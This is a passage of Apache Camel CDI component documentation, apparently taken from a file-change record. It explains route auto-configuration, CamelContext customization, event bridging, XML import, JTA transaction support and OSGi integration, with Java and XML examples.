For example, adding a Camel\nroute is as simple as declaring a class, e.g.:\n\n[source,java]\n----\nclass MyRouteBean extends RouteBuilder {\n\u00a0\n @Override\n public void configure() {\n from(\"jms:invoices\").to(\"file:\/invoices\");\n }\n}\n----\n\nNote that you can declare as many\u00a0`RoutesBuilder` beans as you want.\nBesides,\u00a0`RouteContainer` beans are also automatically collected,\ninstantiated and added to the\u00a0`CamelContext` bean instance managed by\nCamel CDI when the container initializes.\n\n*Available as of Camel 2.19*\n\nIn some situations, it may be necessary to disable the auto-configuration of the `RouteBuilder` and `RouteContainer` beans. That can be achieved by observing for the `CdiCamelConfiguration` event, e.g.:\n\n[source,java]\n----\nstatic void configuration(@Observes CdiCamelConfiguration configuration) {\n configuration.autoConfigureRoutes(false);\n}\n----\n\nSimilarly, it is possible to deactivate the automatic starting of the configured `CamelContext` beans, e.g.:\n\n[source,java]\n----\nstatic void configuration(@Observes CdiCamelConfiguration configuration) {\n configuration.autoStartContexts(false);\n}\n----\n\n### Auto-configured Camel primitives\n\nCamel CDI provides beans for common Camel primitives that can be\ninjected in any CDI beans, e.g.:\n\n[source,java]\n----\n@Inject\n@Uri(\"direct:inbound\")\nProducerTemplate producerTemplate;\n\n@Inject\n@Uri(\"direct:inbound\")\nFluentProducerTemplate fluentProducerTemplate;\n\n@Inject\nMockEndpoint outbound; \/\/ URI defaults to the member name, i.e. mock:outbound\n\n@Inject\n@Uri(\"direct:inbound\")\nEndpoint endpoint;\n\n@Inject\nTypeConverter converter;\n----\n\n### Camel context configuration\n\nIf you just want to change the name of the default `CamelContext` bean,\nyou can used the `@ContextName` qualifier\u00a0provided by Camel CDI, e.g.:\n\n[source,java]\n----\n@ContextName(\"camel-context\")\nclass MyRouteBean extends RouteBuilder {\n\u00a0\n @Override\n public void configure() {\n from(\"jms:invoices\").to(\"file:\/invoices\");\n }\n}\n----\n\nElse, if more customization is needed, any\u00a0`CamelContext`\u00a0class can be\nused to declare a custom Camel context bean. 
Then,\nthe\u00a0`@PostConstruct`\u00a0and\u00a0`@PreDestroy`\u00a0lifecycle callbacks can be done\nto do the customization, e.g.:\n\n[source,java]\n----\n@ApplicationScoped\nclass CustomCamelContext extends DefaultCamelContext {\n\n @PostConstruct\n void customize() {\n \/\/ Set the Camel context name\n setName(\"custom\");\n \/\/ Disable JMX\n disableJMX();\n }\n\n @PreDestroy\n void cleanUp() {\n \/\/ ...\n }\n}\n----\n\nlink:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#producer_method[Producer]\nand\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#disposer_method[disposer]\nmethods can also be used as well to customize the Camel context bean, e.g.:\n\n[source,java]\n----\nclass CamelContextFactory {\n\n @Produces\n @ApplicationScoped\n CamelContext customize() {\n DefaultCamelContext context = new DefaultCamelContext();\n context.setName(\"custom\");\n return context;\n }\n\n void cleanUp(@Disposes CamelContext context) {\n \/\/ ...\n }\n}\n----\n\nSimilarly,\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#producer_field[producer\nfields]\u00a0can be used, e.g.:\n\n[source,java]\n----\n@Produces\n@ApplicationScoped\nCamelContext context = new CustomCamelContext();\n\nclass CustomCamelContext extends DefaultCamelContext {\n\n CustomCamelContext() {\n setName(\"custom\");\n }\n}\n----\n\nThis pattern can be used for example to avoid having the Camel context\nroutes started automatically when the container initializes by calling\nthe\u00a0`setAutoStartup`\u00a0method, e.g.:\n\n[source,java]\n----\n@ApplicationScoped\nclass ManualStartupCamelContext extends DefaultCamelContext {\n\n @PostConstruct\n void manual() {\n setAutoStartup(false);\n }\n}\n----\n\n### Multiple Camel contexts\n\nAny number of `CamelContext` beans can actually be declared in the\napplication as documented above. In that case, the CDI qualifiers\ndeclared on these `CamelContext` beans are used to bind the Camel routes\nand other Camel primitives to the corresponding Camel contexts. From\nexample, if the following beans get declared:\n\n[source,java]\n----\n@ApplicationScoped\n@ContextName(\"foo\")\nclass FooCamelContext extends DefaultCamelContext {\n}\n\n@ApplicationScoped\n@BarContextQualifier\nclass BarCamelContext extends DefaultCamelContext {\n}\n\u00a0\n@ContextName(\"foo\")\nclass RouteAddedToFooCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n\u00a0\n@BarContextQualifier\nclass RouteAddedToBarCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n\u00a0\n@ContextName(\"baz\")\nclass RouteAddedToBazCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n\u00a0\n@MyOtherQualifier\nclass RouteNotAddedToAnyCamelContext extends RouteBuilder {\n\n @Override\n public void configure() {\n \/\/ ...\n }\n}\n----\n\nThe\u00a0`RoutesBuilder` beans qualified with\u00a0`@ContextName` are\nautomatically added to the corresponding `CamelContext` beans by Camel\nCDI. If no such `CamelContext` bean exists, it gets automatically\ncreated, as for the `RouteAddedToBazCamelContext` bean. Note this only\nhappens for the\u00a0`@ContextName`\u00a0qualifier provided by Camel CDI. Hence\nthe\u00a0`RouteNotAddedToAnyCamelContext` bean qualified with the\nuser-defined\u00a0`@MyOtherQualifier`\u00a0qualifier does not get added to any\nCamel contexts. 
That may be useful, for example, for Camel routes that\nmay be required to be added later during the application execution.\n\nNOTE: Since Camel version 2.17.0, Camel CDI is capable of managing any kind of\n`CamelContext` beans (e.g. `DefaultCamelContext`). In previous versions,\nit is only capable of managing beans of type `CdiCamelContext` so it is\nrequired to extend it.\n\nThe CDI qualifiers declared on the\u00a0`CamelContext`\u00a0beans are also used to\nbind the corresponding Camel primitives, e.g.:\n\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\n@Uri(\"direct:inbound\")\nProducerTemplate producerTemplate;\n\n@Inject\n@ContextName(\"foo\")\n@Uri(\"direct:inbound\")\nFluentProducerTemplate fluentProducerTemplate;\n\n@Inject\n@BarContextQualifier\nMockEndpoint outbound; \/\/ URI defaults to the member name, i.e. mock:outbound\n\n@Inject\n@ContextName(\"baz\")\n@Uri(\"direct:inbound\")\nEndpoint endpoint;\n----\n\n### Configuration properties\n\nTo configure the sourcing of the configuration properties used by Camel\nto resolve properties placeholders, you can declare\na\u00a0`PropertiesComponent`\u00a0bean qualified with `@Named(\"properties\")`,\ne.g.:\n\n[source,java]\n----\n@Produces\n@ApplicationScoped\n@Named(\"properties\")\nPropertiesComponent propertiesComponent() {\n Properties properties = new Properties();\n properties.put(\"property\", \"value\");\n PropertiesComponent component = new PropertiesComponent();\n component.setInitialProperties(properties);\n component.setLocation(\"classpath:placeholder.properties\");\n return component;\n}\n----\n\nIf you want to\nuse\u00a0link:http:\/\/deltaspike.apache.org\/documentation\/configuration.html[DeltaSpike\nconfiguration mechanism]\u00a0you can declare the\nfollowing\u00a0`PropertiesComponent` bean:\n\n[source,java]\n----\n@Produces\n@ApplicationScoped\n@Named(\"properties\")\nPropertiesComponent properties(PropertiesParser parser) {\n PropertiesComponent component = new PropertiesComponent();\n component.setPropertiesParser(parser);\n return component;\n}\n\n\/\/ PropertiesParser bean that uses DeltaSpike to resolve properties\nstatic class DeltaSpikeParser extends DefaultPropertiesParser {\n @Override\n public String parseProperty(String key, String value, Properties properties) {\n return ConfigResolver.getPropertyValue(key);\n }\n}\n----\n\nYou can see the\u00a0`camel-example-cdi-properties` example for a working\nexample of a Camel CDI application using DeltaSpike configuration\nmechanism.\n\n### Auto-configured type converters\n\nCDI beans annotated with the\u00a0`@Converter`\u00a0annotation are automatically\nregistered into the deployed Camel contexts, e.g.:\n\n[source,java]\n----\n@Converter\npublic class MyTypeConverter {\n\n @Converter\n public Output convert(Input input) {\n \/\/...\n }\n}\n----\n\nNote that CDI injection is supported within the type converters.\n\n### Camel bean integration\n\n#### Camel annotations\n\nAs part of the Camel\u00a0link:http:\/\/camel.apache.org\/bean-integration.html[bean\nintegration],\u00a0Camel comes with a set\nof\u00a0link:http:\/\/camel.apache.org\/bean-integration.html#BeanIntegration-Annotations[annotations]\u00a0that\nare seamlessly supported by Camel CDI. 
So you can use any of these\nannotations in your CDI beans, e.g.:\n\n[width=\"100%\",cols=\"1,2a,2a\",options=\"header\",]\n|=======================================================================\n|\u00a0 |Camel annotation |CDI equivalent\n|Configuration property a|\n[source,java]\n----\n@PropertyInject(\"key\")\nString value;\n----\n\n a|\nIf using\nhttp:\/\/deltaspike.apache.org\/documentation\/configuration.html[DeltaSpike\nconfiguration mechanism]:\n\n[source,java]\n----\n@Inject\n@ConfigProperty(name = \"key\")\nString value;\n----\n\nSee link:cdi.html[configuration properties] for more details.\n\n|Producer template injection (default Camel context) a|\n[source,java]\n----\n@Produce(uri = \"mock:outbound\")\nProducerTemplate producer;\n\n\/\/ or using fluent template\n@Produce(uri = \"mock:outbound\")\nFluentProducerTemplate producer;\n----\n\n a|\n[source,java]\n----\n@Inject\n@Uri(\"direct:outbound\")\nProducerTemplate producer;\n\n\/\/ or using fluent template\n@Produce(uri = \"direct:outbound\")\nFluentProducerTemplate producer;\n----\n\n|Endpoint injection (default Camel context) a|\n[source,java]\n----\n@EndpointInject(uri = \"direct:inbound\")\nEndpoint endpoint;\n----\n\n a|\n[source,java]\n----\n@Inject\n@Uri(\"direct:inbound\")\nEndpoint endpoint;\n----\n\n|Endpoint injection (Camel context by name) a|\n[source,java]\n----\n@EndpointInject(uri = \"direct:inbound\",\n context = \"foo\")\nEndpoint contextEndpoint;\n----\n\n a|\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\n@Uri(\"direct:inbound\")\nEndpoint contextEndpoint;\n----\n\n|Bean injection (by type) a|\n[source,java]\n----\n@BeanInject\nMyBean bean;\n----\n\n a|\n[source,java]\n----\n@Inject\nMyBean bean;\n----\n\n|Bean injection (by name) a|\n[source,java]\n----\n@BeanInject(\"foo\")\nMyBean bean;\n----\n\n a|\n[source,java]\n----\n@Inject\n@Named(\"foo\")\nMyBean bean;\n----\n\n|POJO consuming a|\n[source,java]\n----\n@Consume(uri = \"seda:inbound\")\nvoid consume(@Body String body) {\n \/\/...\n}\n----\n\n |\u00a0\n|=======================================================================\n\n#### Bean component\n\nYou can refer to CDI beans, either by type or name, From the Camel DSL,\ne.g. 
with the Java Camel DSL:\n\n[source,java]\n----\nclass MyBean {\n \/\/...\n}\n\nfrom(\"direct:inbound\").bean(MyBean.class);\n----\n\nOr to lookup a CDI bean by name from the Java DSL:\n\n[source,java]\n----\n@Named(\"foo\")\nclass MyNamedBean {\n \/\/...\n}\n\nfrom(\"direct:inbound\").bean(\"foo\");\n----\n\n#### Referring beans from Endpoint URIs\n\nWhen configuring endpoints using the URI syntax you can refer to beans\nin the\u00a0link:registry.html[Registry]\u00a0using the `#` notation.\u00a0If the URI\nparameter value starts with a\u00a0`#`\u00a0sign then Camel CDI will lookup\u00a0for a\nbean of the given type by name, e.g.:\n\n[source,java]\n----\nfrom(\"jms:queue:{{destination}}?transacted=true&transactionManager=#jtaTransactionManager\").to(\"...\");\n----\n\nHaving the following CDI bean qualified\nwith\u00a0`@Named(\"jtaTransactionManager\")`:\n\n[source,java]\n----\n@Produces\n@Named(\"jtaTransactionManager\")\nPlatformTransactionManager createTransactionManager(TransactionManager transactionManager, UserTransaction userTransaction) {\n JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();\n jtaTransactionManager.setUserTransaction(userTransaction);\n jtaTransactionManager.setTransactionManager(transactionManager);\n jtaTransactionManager.afterPropertiesSet();\n return jtaTransactionManager;\n}\n----\n\n### Camel events to CDI events\n\n*Available as of Camel 2.17*\n\nCamel provides a set\nof\u00a0link:http:\/\/camel.apache.org\/maven\/current\/camel-core\/apidocs\/org\/apache\/camel\/management\/event\/package-summary.html[management\nevents]\u00a0that can be subscribed to for listening to Camel context,\nservice, route and exchange events. Camel CDI seamlessly translates\nthese Camel events into CDI events that can be observed using\nCDI\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_methods[observer\nmethods], e.g.:\n\n[source,java]\n----\nvoid onContextStarting(@Observes CamelContextStartingEvent event) {\n \/\/ Called before the default Camel context is about to start\n}\n----\n\nAs of Camel 2.18, it is possible to observe events for a particular route (`RouteAddedEvent`,\n`RouteStartedEvent`, `RouteStoppedEvent` and `RouteRemovedEvent`) should it have\nan explicit defined, e.g.:\n\n[source,java]\n----\nfrom(\"...\").routeId(\"foo\").to(\"...\");\n\nvoid onRouteStarted(@Observes @Named(\"foo\") RouteStartedEvent event) {\n \/\/ Called after the route \"foo\" has started\n}\n----\n\nWhen multiple Camel contexts exist in the CDI container, the Camel\ncontext bean qualifiers, like\u00a0`@ContextName`,\u00a0can be used to refine the\nobserver method resolution to a particular Camel context as specified\nin\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_resolution[observer\nresolution], e.g.:\n\n[source,java]\n----\nvoid onRouteStarted(@Observes @ContextName(\"foo\") RouteStartedEvent event) {\n \/\/ Called after the route 'event.getRoute()' for the Camel context 'foo' has started\n}\n\u00a0\nvoid onContextStarted(@Observes @Manual CamelContextStartedEvent event) {\n \/\/ Called after the the Camel context qualified with '@Manual' has started\n}\n----\n\nSimilarly, the\u00a0`@Default`\u00a0qualifier can be used to observe Camel events\nfor the\u00a0_default_\u00a0Camel context if multiples contexts exist, e.g.:\n\n[source,java]\n----\nvoid onExchangeCompleted(@Observes @Default ExchangeCompletedEvent event) {\n \/\/ Called after the exchange 'event.getExchange()' processing has completed\n}\n----\n\nIn 
that example, if no qualifier is specified, the\u00a0`@Any`\u00a0qualifier is\nimplicitly assumed, so that corresponding events for all the Camel\ncontexts get received.\n\nNote that the support for Camel events translation into CDI events is\nonly activated if observer methods listening for Camel events are\ndetected in the deployment, and that per Camel context.\n\n### CDI events endpoint\n\n*Available as of Camel 2.17*\n\nThe CDI event endpoint bridges\nthe\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#events[CDI\nevents]\u00a0with the Camel routes so that CDI events can be seamlessly\nobserved \/ consumed (resp. produced \/ fired) from Camel consumers (resp.\nby Camel producers).\n\nThe\u00a0`CdiEventEndpoint<T>`\u00a0bean provided by Camel CDI can be used to\nobserve \/ consume CDI events whose\u00a0_event type_\u00a0is\u00a0`T`, for example:\n\n[source,java]\n----\n@Inject\nCdiEventEndpoint<String> cdiEventEndpoint;\n\nfrom(cdiEventEndpoint).log(\"CDI event received: ${body}\");\n----\n\nThis is equivalent to writing:\n\n[source,java]\n----\n@Inject\n@Uri(\"direct:event\")\nProducerTemplate producer;\n\nvoid observeCdiEvents(@Observes String event) {\n producer.sendBody(event);\n}\n\nfrom(\"direct:event\").log(\"CDI event received: ${body}\");\n----\n\nConversely, the\u00a0`CdiEventEndpoint<T>`\u00a0bean can be used to produce \/ fire\nCDI events whose\u00a0_event type_\u00a0is\u00a0`T`, for example:\n\n[source,java]\n----\n@Inject\nCdiEventEndpoint<String> cdiEventEndpoint;\n\nfrom(\"direct:event\").to(cdiEventEndpoint).log(\"CDI event sent: ${body}\");\n----\n\nThis is equivalent to writing:\n\n[source,java]\n----\n@Inject\nEvent<String> event;\n\nfrom(\"direct:event\").process(new Processor() {\n @Override\n public void process(Exchange exchange) {\n event.fire(exchange.getBody(String.class));\n }\n}).log(\"CDI event sent: ${body}\");\n----\n\nOr using a Java 8 lambda expression:\n\n[source,java]\n----\n@Inject\nEvent<String> event;\n\nfrom(\"direct:event\")\n .process(exchange -> event.fire(exchange.getIn().getBody(String.class)))\n .log(\"CDI event sent: ${body}\");\n----\n\nThe type variable\u00a0`T` (resp. the qualifiers) of a\nparticular\u00a0`CdiEventEndpoint<T>`\u00a0injection point are automatically\ntranslated into the parameterized\u00a0_event type_\u00a0(resp. 
into the\u00a0_event\nqualifiers_)\u00a0e.g.:\n\n[source,java]\n----\n@Inject\n@FooQualifier\nCdiEventEndpoint<List<String>> cdiEventEndpoint;\n\nfrom(\"direct:event\").to(cdiEventEndpoint);\n\nvoid observeCdiEvents(@Observes @FooQualifier List<String> event) {\n logger.info(\"CDI event: {}\", event);\n}\n----\n\nWhen multiple Camel contexts exist in the CDI container, the Camel\ncontext bean qualifiers, like\u00a0`@ContextName`,\u00a0can be used to qualify\nthe\u00a0`CdiEventEndpoint<T>`\u00a0injection points, e.g.:\n\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\nCdiEventEndpoint<List<String>> cdiEventEndpoint;\n\/\/ Only observes \/ consumes events having the @ContextName(\"foo\") qualifier\nfrom(cdiEventEndpoint).log(\"Camel context (foo) > CDI event received: ${body}\");\n\/\/ Produces \/ fires events with the @ContextName(\"foo\") qualifier\nfrom(\"...\").to(cdiEventEndpoint);\n\nvoid observeCdiEvents(@Observes @ContextName(\"foo\") List<String> event) {\n logger.info(\"Camel context (foo) > CDI event: {}\", event);\n}\n----\n\nNote that the CDI event Camel endpoint dynamically adds\nan\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_methods[observer\nmethod]\u00a0for each unique combination of\u00a0_event type_\u00a0and\u00a0_event\nqualifiers_\u00a0and solely relies on the container\ntypesafe\u00a0link:http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#observer_resolution[observer\nresolution], which leads to an implementation as efficient as possible.\n\nBesides, as the impedance between the\u00a0_typesafe_\u00a0nature of CDI and\nthe\u00a0_dynamic_\u00a0nature of\nthe\u00a0link:http:\/\/camel.apache.org\/component.html[Camel component]\u00a0model is\nquite high, it is not possible to create an instance of the CDI event\nCamel endpoint via\u00a0link:http:\/\/camel.apache.org\/uris.html[URIs]. Indeed, the\nURI format for the CDI event component is:\n\n[source,text]\n----\ncdi-event:\/\/PayloadType<T1,...,Tn>[?qualifiers=QualifierType1[,...[,QualifierTypeN]...]]\n----\n\nWith the authority\u00a0`PayloadType`\u00a0(resp. the\u00a0`QualifierType`) being the\nURI escaped fully qualified name of the payload (resp. qualifier) raw\ntype followed by the type parameters section delimited by angle brackets\nfor payload parameterized type. 
Which leads to\u00a0_unfriendly_\u00a0URIs,\ne.g.:\n\n[source,text]\n----\ncdi-event:\/\/org.apache.camel.cdi.example.EventPayload%3Cjava.lang.Integer%3E?qualifiers=org.apache.camel.cdi.example.FooQualifier%2Corg.apache.camel.cdi.example.BarQualifier\n----\n\nBut more fundamentally, that would prevent efficient binding between the\nendpoint instances and the observer methods as the CDI container doesn't\nhave any ways of discovering the Camel context model during the\ndeployment phase.\n\n### Camel XML configuration import\n\n*Available as of Camel 2.18*\n\nWhile CDI favors a typesafe dependency injection mechanism, it may be\nuseful\u00a0to reuse existing Camel XML configuration files into a Camel CDI\napplication.\u00a0In other use cases, it might be handy to rely on the Camel\nXML DSL to configure\u00a0its Camel context(s).\n\nYou can use the\u00a0`@ImportResource` annotation that's provided by Camel\nCDI on any CDI beans and Camel CDI will automatically load the Camel XML\nconfiguration at the specified locations, e.g.:\n\n[source,java]\n----\n@ImportResource(\"camel-context.xml\")\nclass MyBean {\n}\n----\n\nCamel CDI will load the resources at the specified locations from the\nclasspath (other protocols may be added in the future).\n\nEvery `CamelContext` elements and other Camel _primitives_ from the\nimported resources are automatically deployed as CDI beans during the\ncontainer bootstrap so that they benefit from the auto-configuration\nprovided by Camel CDI and become available for injection at runtime. If\nsuch an element has an explicit `id` attribute set, the corresponding\nCDI bean is qualified with the `@Named` qualifier, e.g., given the\nfollowing Camel XML configuration:\n\n[source,xml]\n----\n<camelContext id=\"foo\">\n <endpoint id=\"bar\" uri=\"seda:inbound\">\n <property key=\"queue\" value=\"#queue\"\/>\n <property key=\"concurrentConsumers\" value=\"10\"\/>\n <\/endpoint>\n<camelContext\/>\n----\n\nThe\u00a0corresponding CDI beans are automatically deployed and can be\ninjected, e.g.:\n\n[source,java]\n----\n@Inject\n@ContextName(\"foo\")\nCamelContext context;\n\n@Inject\n@Named(\"bar\")\nEndpoint endpoint;\n----\n\nNote that the\u00a0`CamelContext`\u00a0beans are automatically qualified with both\nthe\u00a0`@Named`\u00a0and\u00a0`@ContextName`\u00a0qualifiers. 
If the\nimported\u00a0`CamelContext`\u00a0element doesn't have an\u00a0`id`\u00a0attribute, the\ncorresponding bean is deployed with the built-in\u00a0`@Default`\u00a0qualifier.\n\nConversely, CDI beans deployed in the application can be referred to\nfrom the Camel XML configuration, usually using the\u00a0`ref`\u00a0attribute,\ne.g., given the following bean declared:\n\n[source,java]\n----\n@Produces\n@Named(\"baz\")\nProcessor processor = exchange -> exchange.getIn().setHeader(\"qux\", \"quux\");\n----\n\nA reference to that bean can be declared in the imported Camel XML\nconfiguration, e.g.:\n\n[source,xml]\n----\n<camelContext id=\"foo\">\n <route>\n <from uri=\"...\"\/>\n <process ref=\"baz\"\/>\n <\/route>\n<camelContext\/>\n----\n\n\n### Transaction support\n\n*Available as of Camel 2.19*\n\nCamel CDI provides support for Camel transactional client using JTA.\n\nThat support is optional hence you need to have JTA in your application classpath, e.g., by explicitly add JTA as a dependency when using Maven:\n\n[source,xml]\n----\n<dependency>\n <groupId>javax.transaction<\/groupId>\n <artifactId>javax.transaction-api<\/artifactId>\n <scope>runtime<\/scope>\n<\/dependency>\n----\n\nYou'll have to have your application deployed in a JTA capable container or provide a standalone JTA implementation.\n\n[CAUTION]\n====\nNote that, for the time being, the transaction manager is looked up as JNDI resource with the `java:\/TransactionManager` key.\n\nMore flexible strategies will be added in the future to support a wider range of deployment scenarios.\n====\n\n#### Transaction policies\n\nCamel CDI provides implementation for the typically supported Camel `TransactedPolicy` as CDI beans. It is possible to have these policies looked up by name using the transacted EIP, e.g.:\n\n[source,java]\n----\nclass MyRouteBean extends RouteBuilder {\n\n @Override\n public void configure() {\n from(\"activemq:queue:foo\")\n .transacted(\"PROPAGATION_REQUIRED\")\n .bean(\"transformer\")\n .to(\"jpa:my.application.entity.Bar\")\n .log(\"${body.id} inserted\");\n }\n}\n----\n\nThis would be equivalent to:\n\n[source,java]\n----\nclass MyRouteBean extends RouteBuilder {\n\n @Inject\n @Named(\"PROPAGATION_REQUIRED\")\n Policy required;\n\n @Override\n public void configure() {\n from(\"activemq:queue:foo\")\n .policy(required)\n .bean(\"transformer\")\n .to(\"jpa:my.application.entity.Bar\")\n .log(\"${body.id} inserted\");\n }\n}\n----\n\nThe list of supported transaction policy names is:\n\n- `PROPAGATION_NEVER`,\n- `PROPAGATION_NOT_SUPPORTED`,\n- `PROPAGATION_SUPPORTS`,\n- `PROPAGATION_REQUIRED`,\n- `PROPAGATION_REQUIRES_NEW`,\n- `PROPAGATION_NESTED`,\n- `PROPAGATION_MANDATORY`.\n\n#### Transactional error handler\n\nCamel CDI provides a transactional error handler that extends the redelivery error handler, forces a rollback whenever an exception occurs and creates a new transaction for each redelivery.\n\nCamel CDI provides the `CdiRouteBuilder` class that exposes the `transactionErrorHandler` helper method to enable quick access to the configuration, e.g.:\n\n[source,java]\n----\nclass MyRouteBean extends CdiRouteBuilder {\n\n @Override\n public void configure() {\n errorHandler(transactionErrorHandler()\n .setTransactionPolicy(\"PROPAGATION_SUPPORTS\")\n .maximumRedeliveries(5)\n .maximumRedeliveryDelay(5000)\n .collisionAvoidancePercent(10)\n .backOffMultiplier(1.5));\n }\n}\n----\n\n\n### Auto-configured OSGi integration\n\n*Available as of Camel 2.17*\n\nThe Camel context beans are automatically 
adapted by Camel CDI so that\nthey are registered as OSGi services and the various resolvers\n(like\u00a0`ComponentResolver` and\u00a0`DataFormatResolver`) integrate with the\nOSGi registry. That means that the link:karaf.html[Karaf Camel commands]\ncan be used to operate the Camel contexts auto-configured by Camel CDI,\ne.g.:\n\n[source,brush:,text;,gutter:,false;,theme:,Default]\n----\nkaraf@root()> camel:context-list\n Context Status Total # Failed # Inflight # Uptime\n ------- ------ ------- -------- ---------- ------\n camel-cdi Started 1 0 0 1 minute\n----\n\nSee the\u00a0`camel-example-cdi-osgi` example for a working example of the\nCamel CDI OSGi integration.\n\n\n### Lazy Injection \/ Programmatic Lookup\n\nWhile the CDI programmatic model favors a http:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#typesafe_resolution[typesafe resolution]\nmechanism that occurs at application initialization time, it is possible to perform\ndynamic \/ lazy injection later during the application execution using the\nhttp:\/\/docs.jboss.org\/cdi\/spec\/1.2\/cdi-spec.html#programmatic_lookup[programmatic lookup]\nmechanism.\n\nCamel CDI provides for convenience the annotation literals corresponding to the\nCDI qualifiers that you can use for standard injection of Camel primitives.\nThese annotation literals can be used in conjunction with the `javax.enterprise.inject.Instance`\ninterface which is the CDI entry point to perform lazy injection \/ programmatic lookup.\n\nFor example, you can use the provided annotation literal for the `@Uri` qualifier\nto lazily lookup for Camel primitives, e.g. for `ProducerTemplate` beans:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<ProducerTemplate> producers;\n\nProducerTemplate inbound = producers\n .select(Uri.Literal.of(\"direct:inbound\"))\n .get();\n----\n\nOr for `Endpoint` beans, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<Endpoint> endpoints;\n\nMockEndpoint outbound = endpoints\n .select(MockEndpoint.class, Uri.Literal.of(\"mock:outbound\"))\n .get();\n----\n\nSimilarly, you can use the provided annotation literal for\nthe `@ContextName` qualifier to lazily lookup for `CamelContext`\nbeans, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<CamelContext> contexts;\n\nCamelContext context = contexts\n .select(ContextName.Literal.of(\"foo\"))\n .get();\n----\n\nYou can also refined the selection based on the Camel context type, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<CamelContext> contexts;\n\n\/\/ Refine the selection by type\nInstance<DefaultCamelContext> context = contexts.select(DefaultCamelContext.class);\n\n\/\/ Check if such a bean exists then retrieve a reference\nif (!context.isUnsatisfied())\n context.get();\n----\n\nOr even iterate over a selection of Camel contexts, e.g.:\n\n[source,java]\n----\n@Any\n@Inject\nInstance<CamelContext> contexts;\n\nfor (CamelContext context : contexts)\n context.setUseBreadcrumb(true);\n----\n\n\n### Maven Archetype\n\nAmong the available\u00a0link:camel-maven-archetypes.html[Camel Maven\narchetypes], you can use the provided\u00a0`camel-archetype-cdi`\u00a0to generate\na Camel CDI Maven project, e.g.:\n\n[source,bash]\n----\nmvn archetype:generate -DarchetypeGroupId=org.apache.camel.archetypes -DarchetypeArtifactId=camel-archetype-cdi\n----\n\n### Supported containers\n\nThe Camel CDI component is compatible with any CDI 1.0, CDI 1.1 and CDI\n1.2 compliant runtime. 
It's been successfully tested against the\nfollowing runtimes:\n\n[width=\"100%\",cols=\"2,1m,2\",options=\"header\",]\n|============================================\n|Container |Version |Runtime\n|Weld SE |1.1.28.Final |CDI 1.0 \/ Java SE 7\n|OpenWebBeans |1.2.7 |CDI 1.0 \/ Java SE 7\n|Weld SE |2.4.2.Final |CDI 1.2 \/ Java SE 7\n|OpenWebBeans |1.7.2 |CDI 1.2 \/ Java SE 7\n|WildFly |8.2.1.Final |CDI 1.2 \/ Java EE 7\n|WildFly |9.0.1.Final |CDI 1.2 \/ Java EE 7\n|WildFly |10.1.0.Final |CDI 1.2 \/ Java EE 7\n|Karaf |2.4.4 |CDI 1.2 \/ OSGi 4 \/ PAX CDI\n|Karaf |3.0.5 |CDI 1.2 \/ OSGi 5 \/ PAX CDI\n|Karaf |4.0.4 |CDI 1.2 \/ OSGi 6 \/ PAX CDI\n|============================================\n\n\n### Examples\n\nThe following examples are available in the `examples` directory of the\nCamel project:\n\n[width=\"100%\",cols=\"1m,3\",options=\"header\",]\n|============================================\n|Example |Description\n\n|camel-example-cdi\n|Illustrates how to work with Camel using CDI to configure components,\nendpoints and beans\n\n|camel-example-cdi-kubernetes\n|Illustrates the integration between Camel, CDI and Kubernetes\n\n|camel-example-cdi-metrics\n|Illustrates the integration between Camel, Dropwizard Metrics and CDI\n\n|camel-example-cdi-properties\n|Illustrates the integration between Camel, DeltaSpike and CDI for\nconfiguration properties\n\n|camel-example-cdi-osgi\n|A\u00a0CDI application using the SJMS component that can be executed\ninside an OSGi container using PAX CDI\n\n|camel-example-cdi-rest-servlet\n|Illustrates the Camel REST DSL being used in a Web application that\nuses CDI as dependency injection framework\n\n|camel-example-cdi-test\n|Demonstrates the testing features that are provided as part of\nthe integration between Camel and CDI\n\n|camel-example-cdi-xml\n|Illustrates the use of Camel XML configuration\nfiles into a Camel CDI application\n\n|camel-example-swagger-cdi\n|An example using REST DSL and Swagger Java with CDI\n\n|camel-example-widget-gadget-cdi\n|The Widget and Gadget use-case from the EIP book implemented\nin Java with CDI dependency Injection\n\n|============================================\n\n### See Also\n\n* link:cdi-testing.html[Camel CDI testing]\n* http:\/\/www.cdi-spec.org[CDI specification Web site]\n* http:\/\/www.cdi-spec.org\/ecosystem\/[CDI ecosystem]\n* http:\/\/weld.cdi-spec.org[Weld home page]\n* http:\/\/openwebbeans.apache.org[OpenWebBeans home page]\n* https:\/\/github.com\/astefanutti\/further-cdi[Going further with CDI and Camel]\n(See Camel CDI section)\n","old_contents":"## Camel CDI\n\nThe Camel CDI component provides auto-configuration for Apache Camel\nusing CDI as dependency injection framework based\non\u00a0_convention-over-configuration_. It auto-detects Camel routes\navailable in the application and provides beans for common Camel\nprimitives like `Endpoint`,\u00a0`FluentProducerTemplate`, `ProducerTemplate` or\u00a0`TypeConverter`. It\nimplements standard link:bean-integration.html[Camel bean integration]\nso that Camel annotations like\u00a0`@Consume`,\u00a0`@Produce`\nand\u00a0`@PropertyInject` can be used seamlessly in CDI beans. Besides, it\nbridges Camel events (e.g. `RouteAddedEvent`,\n`CamelContextStartedEvent`,\u00a0`ExchangeCompletedEvent`, ...) 
